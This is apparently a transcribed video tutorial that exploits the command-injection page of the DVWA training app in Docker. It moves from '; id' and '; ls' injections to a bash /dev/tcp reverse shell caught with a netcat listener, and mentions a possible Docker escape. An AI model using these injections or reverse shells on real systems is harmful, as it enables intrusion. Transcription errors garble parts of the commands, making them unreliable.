Hello everyone. So today we are going to look at a vulnerable application called as DVWA. I'm going to run this in a Docker, and for running the Docker I am using this Docker file from Raj77 in Vuln apps, and I am running this with the command that is shown here. I have run it with a slightly different command, and the command that I have used is docker run -rm -d -p to expose all ports, and then the name of the image. And if I do a docker ps, we can see that it is exposing 32813 to port 22 and 32814 to port 80. So we can go to port number 32814, and this is running on a different machine, which is a Ubuntu box. So I have given the IP here :321814, and this is the page we are going to see. So first thing we are going to see is this page, and first we want to set up the DB, which is for DVWA. So we are going to click on this, and we can see the setup page. You will see some warnings here, which is fine. Let's create and reset database, and then please log in. So you will see the login page, and now you can see that here we are showing that username and password is admin and password. So we are going to log in here. Admin, password. Now this is DVWA page, and this has some multiple vulnerabilities that you can play around with. But first we go there, we will go to DVWA security and change this impossible to low, and then click on submit. So this will set the low security level to low. Now let's look at some of the issues. So first we are going to look at command injection, and here it is asking us to enter an IP address. So let's see what happens if we enter 127.0.0.1 and we click on submit. We can see the output of ping command, and this is supposedly looking like the ping output from a OS command, right? So let's try to see if we can run a OS command. So what I am going to do is 127.0.0.1, and then I will just say ID, and then semicolon again. Semicolon is used to separate commands in bash. So if I do a time semicolon, let's say date semicolon ls, then you can see that I can see the date, and then immediately following this is the ls output. So semicolon is used to separate the commands, the multiple commands in a single line. So let's try whether this works or not, and we will click on submit. And we can see the output of id command here. Now that we know that this works, let me also show you one more time, right? So if I, instead of id, if I just give ls, I can see that we are getting the output of ls command, right? So now let's try to do something interesting. So I will remove this, and I will just say bash -c, bash -i, close everything, dev tcp 92.168 dot. Let me check the IP address of our machine. This is the remote machine, so I'll go here, and the IP address we are interested is in 235.142. So 168.235.142, and let's use port number 8001, and we will say 02N1, 02N1, and 1, and then we will close the double quotes that we had started, and we will just copy this start a reverse shell here, nc minus lvnp 8001 and submit here. And we have got a shell here. We can check that we are on the right machine. As you can see, there are not much interfaces here, and the IP address is 172.16.17.02. So this is a Docker, and if we do a host name, we can see that it has a weird host name, which is again Docker. And if we go to cd/ls-a, we should see a Docker env, not Docker env file. This confirms that we are in a Docker. So we were able to use the command injection to get into this Docker, and from here, if you had a possible Docker escape, then you could go into host, and from there you can do everything else. But this just shows how quickly you are able to get into the Docker if there is a command injection vulnerability in your system. That's all for today. Thank you.